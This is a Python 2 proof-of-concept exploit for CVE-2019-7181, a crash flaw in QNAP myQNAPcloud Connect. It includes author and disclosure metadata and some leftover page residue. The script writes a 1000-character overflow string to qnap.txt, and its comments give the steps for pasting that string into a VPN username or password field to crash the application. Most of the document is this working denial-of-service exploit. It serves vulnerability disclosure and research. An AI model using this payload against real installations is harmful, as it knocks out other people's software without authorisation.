29 lines
No EOL
995 B
Python
Executable file
29 lines
No EOL
995 B
Python
Executable file
#!/usr/bin/python
|
|
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
|
|
# Date: 19/04/2019
|
|
# Exploit Author: Dino Covotsos - Telspace Systems
|
|
# Vendor Homepage: https://www.qnap.com
|
|
# Version: 1.3.4.0317 and below are vulnerable
|
|
# Software Link: https://www.qnap.com/en/utilities/essentials
|
|
# Contact: services[@]telspace.co.za
|
|
# Twitter: @telspacesystems (Greets to the Telspace Crew)
|
|
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
|
|
# CVE: CVE-2019-7181
|
|
# POC
|
|
# 1.) Generate qnap.txt
|
|
# 2.) Copy the contents of qnap.txt to the clipboard
|
|
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
|
|
# 4.) Click ok, program crashes.
|
|
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
|
|
|
|
buffer = "A" * 1000
|
|
|
|
payload = buffer
|
|
try:
|
|
f=open("qnap.txt","w")
|
|
print "[+] Creating %s bytes QNAP payload.." %len(payload)
|
|
f.write(payload)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |